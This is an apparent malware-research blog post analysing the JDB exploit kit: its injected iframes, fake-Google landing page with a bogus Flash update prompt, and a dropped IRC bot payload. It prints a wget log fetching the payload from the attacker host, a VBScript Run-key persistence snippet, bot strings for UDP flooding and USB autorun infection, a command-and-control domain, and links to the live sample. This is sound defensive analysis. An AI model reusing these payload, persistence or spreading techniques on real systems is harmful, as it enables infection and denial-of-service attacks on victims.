Thứ Tư, 30 tháng 1, 2013

Background


There are good investigations that make you feel good after decoding everything up,
and there are also some incompleted ones, like this story. Which is really annoying
me in the end, but I decided to release it anyway, for sharing information purpose.

Why this wasn't good? Actually is not *that* bad, I got the exploit kit script
figured well, but missing the JAR exploit infector file thus somehow the
payload (definitely malicious) won't infect my PC eventhough I tried it in many ways.
So there were a LOT of things to do & time to consume to make this post..
[NEW!] - With the help of other researchers we fully figured the
payload w/details -->>[HERE]
[NEW!] - The JAR details of this exploit kit is written in
the next post -->>[HERE]

These are the set of JDB infection at our first attempt:


It all started from infected sites with IFRAME contains "jdb/inf・php?id=" strings.
Found it UP AND ALIVE in many online sites in internet now, i.e.:
Several Facebook's posts like:

Developer Forum's posts like:

An injected code in blog sites like:

Also found it as injected code in gamer sites:

Or some code pasted in Paste posts like:

Shortly, I searched about 23 sites contains this infected code before I call it a day,
if you want to confirm this injections please check it by google for "jdb/inf・php?id="
strings.(Thank's to @Hulk_Crusader for finding the infector tips in internet)

These injected url leads to the same infector site at the below url:
212,7.192.100/jdb/inf.php?id=xxx

If we check into URLquery will show the below result:
(Thank's for @MalwareSigs for the url hint which was perfectly matched to the case!)

Discussing this matter with our team-mate @Hulk_Crusader, we found out
these are the infection of JDB Exploit Kit.
Honestly, we really have no idea what this is all about except some reference
in the internet, so after seeing Hulk's rage is increased (see below)..

.. I decided to investigate this further. Here we go:

Landing Page


Every Exploit Pack has different works, so does this one. And this one has its
unique ways. I accessed the two below confirmed infectors from URLQuery: (thanks Hulk!)
212,7.192.100/jdb/inf,php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
212,7.192.100/jdb/inf,php?id=454897430d071f42dc980fcfe917c75a
And they worked in different way, even the request was sent by a simple defined static conditions: "With Java and without Java" While accessing the 1st url, with or without Java I received below script response: And I have response of landing page script if accessing the 2nd URL "with Java": ↑This is how we got in touch with the landing page of JDB Exploit Kit. So how is it goes if we got infected? I tried to infect my self by using the landing page, and it goes like this: I tried to connect to one of URL above & having a pop up asking for Adobe Flash update: In the Java console I found the access for java classes which was executed as per logged below: You maybe have different response depends on your browser, but If we use the latest IE + Java in the browser the response might look like pic below: Back to the code, in either the 1st or 2nd accessed URL above this javascript was executed: If we press the OK button the malware file is starting to be downloaded. Let's make sure that the url is still valid...
--2013-01-30 15:45:05--  
h00p://212,7.192.100/jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a
seconds 0.00, Connecting to 212,7.192.100:80... seconds 0.00, connected.
:
GET /jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a HTTP/1.0
Referer: (Put the URL of infected site here..)
User-Agent: MalwareMustDie rocks JDB now!
Host: "212,7.192.100"
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: "Wed, 30 Jan 2013 06:45:52 GMT"
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename="Adobe-Flash_WIN.exe"
Connection: close
Content-Type: application/octet-stream
:
200 OK
Length: "unspecified [application/octet-stream]"
Saving to: "Adobe-Flash_WIN.exe"
2013-01-30 15:45:08 (99.0 KB/s) - "Adobe-Flash_WIN.exe" saved [83968]
And this is the actual file looks like: ↑What was popped up as Adobe Updater looks like "Image Extractor" now :-) The point of this section is both Java or not Java supported browser is being targeted by JDB exploit kit. Let's move on. We'll go back to this payload analysis later.. Now let's see the detail code in the landing page. JDB uses the PluginDetect-base java script, a well-customized one. I hardly recognize the base if I didn't look at it very well. In a glimpse you'll probably will think that you are seeing Google page source code.. I'll explain to you why. We can see the PluginDetect typical code traces like below:
"The usage of the alphabetical values of PluginDetect.."
// You'll se this very much scattered in codes..
(function () {
var b, c, d, e;
function g(a, f) {...
:

"The way of PluginDtect Define the DOM/XML Component of IE:"

(function () {
var a, b = "1";
if (document && document.getElementById) if ("undefined" != typeof XMLHttpRequest) b = "2";
else if ("undefined" != typeof ActiveXObject) {
var c, d, e = ["MSXML2.XMLHTTP.6.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP"];
for (c = 0; d = e[c++];) try {
new ActiveXObject(d), b = "2"
} catch (f)...

(etc..etc..)
JDB EK scattered the infector script between CSS & HTML like the below structure, PS: as per mentioned, it required Java installed for folowing this scheme..
"Infector script came up first..."
<script ..
setTimeout("alert('Adobe Flash must be updated to view this, please install the latest version!'...;
setTimeout("location.href = ...

"Continued by the java applet..."
<applet width='0px' height='0px'
code="GAME,class" archive="data・php?id=xxxx....
"
"HTML starts, following by a redirector script code of faking Google page.."
<html itemscope="itemscope" itemtype="http://schema.org/WebPage">
<head>
<meta itemprop="image" content="/images/google_favicon_128.png">
<title>Google</title>
<script>
(function () {
window.google = {
kEI: "xcrhUNW6MpHBswbloYHoBA",
getEI: function (a) {
for (var b; a && (!a.getAttribute || !(b = a.getAttribute("eid")));) a = a.parentNode;
return b || google.kEI

"Some obfuscation detected here.."
kEXPI: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
kCSI: {
e: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
ei: "xcrhUNW6MpHBswbloYHoBA"
:
"..Following by PluginDetct customized.. with all stuffs -
was related/linked with the Google...
no wonder many automation got fooled by this
and think it was google redirection page.."

<script> (
 function () {
try {
var e = !0,
h = null,
j = !1;
var aa = function (a, b, c, d) {
d = d || {};
d._sn = ["cfg", b, c].join(".");
window.gbar.logger.ml(a, d)
};
var m = window.gbar = window.gbar || {},
  p = window.gbar.i = window.gbar.i || {}, ba;
       :
The full "neutralized" landing script is-->>[HERE]Please see the code in the pastebin well, and you'll see many Google API & calls used. Conclusion is, you should be aware of which are the real Google page & which are not if you meet this kind of exploit kit. What looks like Google maybe is not real Google. PS: This "faking" scheme actually can be implemented in many portals or SNS sites too.. So let&s be aware of this trend. Below is the snapshot of fake Google page generated by this landing page: In additional,I studied other case which were reported in URLquery here -->>[URLquery] too. ↑In that case user were redirected perfectly to the Google portal (http://www.google.no/), with also generated javascript eval() obfuscated hex values (pls expand the bottom parts) I tried to decode it in some ways it's meaningful.. and still not making any sense..

JAR Infector

It has the JAR infector as per above landing page mentioned "class.class" or "GAME.class" , which are referred to the download url as per mentioned applet tag mentioned above, (at the beginning of the landing page script) Nd it pointed to the part below:
GAME.class' archive='data.php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
Note: Due to some technicalities in fetching this file, I will add the JAR analysis later.. The file is there. But always returning 0 byte, as per logged below:
HTTP/1.1 200 OK
Date: Wed, 30 Jan 2013 13:39:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename=0e60198f77a4c5f78f2d8fb8fa7e5776.jar
"Content-Length: 0 <========="
Connection: close
Content-Type: application/octet-stream
:
200 OK
Length: 0 [application/octet-stream]
The JAR adventure of this Anon JDB EK is longer than I thought, so it will write it in the next post, stay tune! [NEW] The JAR & its payload report is here-->>[HERE]

Payload

OK, we got one payload in this first attempt. And in our next post you can see much more payloads dropped from the JARs file, let's continue w/this payload: Looks like already uploaded into internet 5(five)hours ago, AV products are detecting this as a DarkKomet trojan, a backdoor downloader. Below is Virus Total Scan Details:
SHA1:      e5d2da5b3546f24e1510f8ae53e0d05ce342c806
MD5: 10c8559523f8f5787daa3dc8e47b64e1
File size: 82.0 KB ( 83968 bytes )
File name: Adobe-Flash_WIN.exe
File type: Win32 EXE
Tags: peexe
Detection: 15 / 46
Analysis date: 2013-01-30 06:42:34 UTC ( 5 hours, 40 minutes ago )
URL: https://www.virustotal.com/latest-scan/90359af6d9dafee904552f17318cee1c26d7bd68db30fae362b69c4693d57aa1

"Malware name:"
F-Secure : Gen:Variant.Zusy.33769
DrWeb : BackDoor.HostBooter.3
GData : Gen:Variant.Zusy.33769
AhnLab-V3 : Backdoor/Win32.DarkKomet
ESET-NOD32 : a variant of MSIL/Injector.AZM
VBA32 : TScope.Trojan.MSIL.gen
TrendMicro-HouseCall : TROJ_GEN.F4AHZAM
Avast : Win32:Malware-gen
BitDefender : Gen:Variant.Zusy.33769
Agnitum : Trojan.Scarsi!W0yI8SvDe54
Malwarebytes : Trojan.Downloader.ED
Ikarus : Backdoor.Win32.DarkKomet
Fortinet : MSIL/Dropper.CSS!tr
AVG : Dropper.Generic7.ATKY
Panda : Trj/Dtcontx.A
OK, AV signature Said DarkKomet, so let's take a look closer... Remember you should see yourself it to understand what it really is. The binary looks like this:
Compilation timedatestamp: 2013-01-18 21:26:40
Compiled by: Microsoft Visual Basic .NET
Target machine: 0x14C (Intel 386)
Entry Point at: 0x64ee
Virtual Address is 0x4080ee
Sections:
.text 0x2000 0x60f4 25088 // no packer detected
.sdata 0xa000 0xb0 512
.rsrc 0xc000 0xdd00 56832
.reloc 0x1a000 0xc 512
"HEX snips.."
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 10 BE F9 50 00 00 00 00 PE..L......P....
0090 00 00 00 00 E0 00 02 01 0B 01 0B 00 00 62 00 00 .............b..
00A0 00 E2 00 00 00 00 00 00 EE 80 00 00 00 20 00 00 ............. ..
00B0 00 A0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 ......@.. ......
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................
00D0 00 C0 01 00 00 04 00 00 00 00 00 00 02 00 40 85 ..............@.
00E0 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 ................
00F0 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................
0100 A0 80 00 00 4B 00 00 00 00 C0 00 00 00 DD 00 00 ....K...........
Interesting findings in binary;
A compilation trace...
0x006634 C:\Users\USER\Documents\Mallette magique\stubs\
Image Extract v1.3\Image Extract v1.3
\obj\x86\Release\Image Extract v1.3.pdb
Looks it drops this file...
0x00509D   c:\MyTest.txt
The binary contains these "interesting" words :-)
0x0050C7   Blues           0x00561D   Folk/Rock         0x005369   Meditative           0x005871   Tango
0x0050D3 Classic Rock 0x005631 National Folk 0x00537F Instrumental Pop 0x00587D Samba
0x0050ED Country 0x00564D Swing 0x0053A1 Instrumental Rock 0x005889 Folklore
0x0050FD Dance 0x005659 Bebob 0x0053C5 Ethnic 0x00589B Ballad
0x005109 Disco 0x005665 Latin 0x0053D3 Gothic 0x0058A9 Power Ballad
0x00511F Grunge 0x005671 Revival 0x0053E1 Darkwave 0x0058C3 Rhythmic Soul
0x00514B Metal 0x005681 Celtic 0x005419 Electronic 0x0058DF Freestyle
0x005157 New Age 0x00568F Bluegrass 0x005443 Eurodance 0x0058FD Punk Rock
0x005167 Oldies 0x0056A3 Avantgarde 0x005457 Dream 0x005911 Drum Solo
0x005175 Other 0x0056B9 Gothic Rock 0x005463 Southern Rock 0x005925 A Cappella
0x005199 Reggae 0x0056D1 Progressive Rock 0x00547F Comedy 0x005955 Dance Hall
0x0051B1 Techno 0x0056F3 Psychedelic Rock 0x005497 Gangsta 0x005973 Drum & Bass
0x0051BF Industrial 0x005715 Symphonic Rock 0x0054A7 Top 40 0x0059A5 Hardcore
0x0051D5 Alternative 0x005733 Slow Rock 0x0054B5 Christian Rap 0x0059B7 Terror
0x0051F5 Death Metal 0x005747 Big Band 0x0054D1 Pop/Funk 0x0059C5 Indie
0x00520D Pranks 0x005759 Chorus 0x0054E3 Jungle 0x0059D1 BritPop
0x00521B Soundtrack 0x005767 Easy Listening 0x0054F1 Native American 0x0059E1 Negerpunk
0x00524B Ambient 0x005785 Acoustic 0x005511 Cabaret 0x0059F5 Polsk Punk
0x00526F Vocal 0x005797 Humour 0x005521 New Wave 0x005A15 Christian Gangsta Rap
0x00527B Jazz Funk 0x0057A5 Speech 0x005533 Psychadelic 0x005A41 Heavy Metal
0x00528F Fusion 0x0057B3 Chanson 0x005555 Showtunes 0x005A59 Black Metal
0x00529D Trance 0x0057C3 Opera 0x005569 Trailer 0x005A71 Crossover
0x0052AB Classical 0x0057CF Chamber Music 0x005589 Tribal 0x005A85 Contemporary Christian
0x0052BF Instrumental 0x0057EB Sonata 0x005597 Acid Punk 0x005AB3 Christian Rock
0x0052E3 House 0x0057F9 Symphony 0x0055AB Acid Jazz 0x005AD1 Merengue
0x0052F9 Sound Clip 0x00580B Booty Bass 0x0055BF Polka 0x005AE3 Salsa
0x00530F Gospel 0x005821 Primus 0x0055CB Retro 0x005AEF Thrash Metal
0x00531D Noise 0x00582F Porn Groove 0x0055D7 Musical 0x005B09 Anime
0x005329 AlternRock 0x005847 Satire 0x0055E7 Rock & Roll 0x005B1F Synthpop
0x00535D Space 0x005855 Slow Jam 0x0055FF Hard Rock
If it is a DarkKomet trojan, it supposed opening backdoor & making calls to the mothership. So I wonder what exactly *this* DarKomet will do... Maybe if we lucky we can see the location of the mothership too. Well, I run this payload like below snapshot to see its malicious acts: As per expected, it dropped the txt file in root folder, so far so good.. But too bad,↑the file is containing zero byte.. I run and check it here and there, like: Well, it run. Yes. but no malicious act detected in my test :-( It runs, for say 10 seconds then exit 0. It doesn't actually opening any network socket for backdoor nor making internet connection.. Strange.. Only in the memory I saw a lot of suspicious calls like:
0x4DC446      http\shell\open\command
0x4DE1CE http://
0x30E16E WWW-AuthenticateHTTP/
0x2DA392 HTTP/1.1 200 OK
0x2D2A5A HttpListenerContext#
0x2D2DDA httpListener#
0x2D2E76 httpContext#
0x2D2F2E HTTP Method:
0x383E72 HTTP_SEND_REQUEST_FLAG_MORE_DATA
0x383E96 HTTP_RECEIVE_REQUEST_FLAG_COPY_BODY
0x383EBA HTTP_SEND_RESPONSE_FLAG_MORE_DATA
0x383EDE HTTP_SEND_RESPONSE_FLAG_RAW_HEADER
↑So it supposed to start connecting internet but it doesn't.. no PCAP. At that time, the suspicious traces I found is at the memory dump, and some operation in IE cache in windows' registry.. it's really annoying. [NEW!] After a while I was contacted by our researcher friend: Matt of @undeadsecurity , which explained he got the PCAP. you can see Matt's post here -->>[Link](thank's for the good work!--> @undeadsecurity) Matt's recorded below traffic: (the pic below belongs to Matt/@undeadsecurity) Which we can eliminate the broadcast address of 10.74.4.255 and also eliminate AKAMAI network from the list, what's left in the traffic (in PCAP)is the malware communication: ↑You see DNS query to adultsirc.no-ip.org + some connect tries to IRC 6667 port. At the time I saw this I was decided to drop the verdict of AV products which saying about Trojan DarkKomet etc etc (which you should too!). Still, I couldn't make it run it in my system so I took into Matt's report further, and it was mentioned this IMPORTANT trails:
on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "jeQodSivaa"
strValue = """C:\Users\Admin\AppData\Roaming\pbYRmjBa3B\L4b1HYCWGL.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue
Since I didn't have more clue, ↑this is my base to start searching and asking more for references. A while ago I received a very good advise in kernel mode to strip .NET - onfuscator trails in the binary. (thank's to @Rinn of kernelmode). Previous words are actually the .NET obfuscator:
0x0050D3   Classic Rock    0x005631   National Folk     0x00537F   Instrumental Pop     0x00587D   Samba
0x0050ED Country 0x00564D Swing 0x0053A1 Instrumental Rock 0x005889 Folklore
0x0050FD Dance 0x005659 Bebob 0x0053C5 Ethnic 0x00589B Ballad
So all we do is remove it & assemble the binary then re-checking the insides one more time to find the below malicious operation clues: UDP Flooding/DoS attack operation (Saw Hulk's face is getting greener here...)
0x001600   Flooding: "%s:%d", Delay: "%d(ms)", For "%d" Seconds
0x0015E8 %d%d%d%d%d%d%d%d
0x001590 %s %s %s
0x001574 %s %s :[AryaN]: %s
0x00156C %s %s
0x001558 %s "" "%s" :%s
0x0015A4 Finished Flooding "%s:%d"
0x0015C4 Terminated UDP Flood Thread
Bot Killer feature... (I don't have a heart to se Hulk's face at this point..)
0x000768   Botkiller
0x000774 Successfully Killed And Removed Malicious File: "%s"
0x000800 Usage: %s IP PORT DELAY LENGTH
0x000828 Failed To Start Thread: "%d"
0x00084C Failed: Mis Parameter
Found the below URL:
0x000C84   h00p://api.wipmania.com/
Accesssing removable drives + infecting with autorun.inf w/autostart: (you really don't want to know what's Hulk did at this point..)
0x0017A4   LNK Infected Removable Device: "%s\", Created: "%d" Lnk Files
0x0019B4 AutoRun Infected Removable Device: "%s\"
:
0x0014BC Software\Microsoft\Windows\CurrentVersion\Run
0x001640 %temp%\deletethis.exe
0x001674 Removable_Drive.exe
0x0016BC %s\{%s-%s}
0x0016D8 /k "%s" Open %s
0x001700 %windir%\System32\cmd.exe
0x001740 %s\Removable_Drive.exe
0x001778 %s\%s
0x001788 %s\%s.lnk
0x001990 %s\autorun.inf
Self-update feature...
0x000A18   Update Complete, Uninstalling
0x000A3C Successfully Executed Process: "%s"
0x000A68 Failed To Create Process: "%s", Reason: "%d"
0x000AA0 Successfully Replaced AryaN File With Newly Download File, Update Will Take Affect On Next Reboot
0x000B48 Successfully Downloaded File To: "%s"
0x000B78 Downloading File: "%s"
0x000B94 Download
:
0x000874 Failed: "%d"
0x000884 Visit
0x00088C Failed: Mis Parameter, Usage: %s [SHOW/HIDE] [URL]
0x0008D4 Filed To Visit: "%s"
0x0008F0 Successfully Visited: "%s"
0x000920 %s #%s
0x00092C %s %s
0x000940 Terminated WGet Thread
0x000964 Running From: "%s"
0x00097C [%s][%s] - "%s"
0x000990 hh':'mm':'ss
0x0009E8 {%s}: %s
And some more, which lead us to the reliable references below: Threat Expert Uploaded Ref 7 November 2011, 15:16:47-->>[HERE]SonicWall Security Center ALERT 1 -->>[HERE]SonicWall Security Center ALERT 2 -->>[HERE]

Research Material

Here's the 1.5MB download for the dump (snapped double data on it)-->>[HERE]Be free to download the sample -->>[HERE] - if you are willing to examine it yourself. The download of PCAP I stripped from Matt's effort is-->>[HERE]The full text of the stripped .NET obfuscator binary in text -->>[HERE]That's it for today, the JAR used by this Exploit Kit is written in - the next post here --->>[HERE]
#MalwareMustDie!

0 nhận xét:

Đăng nhận xét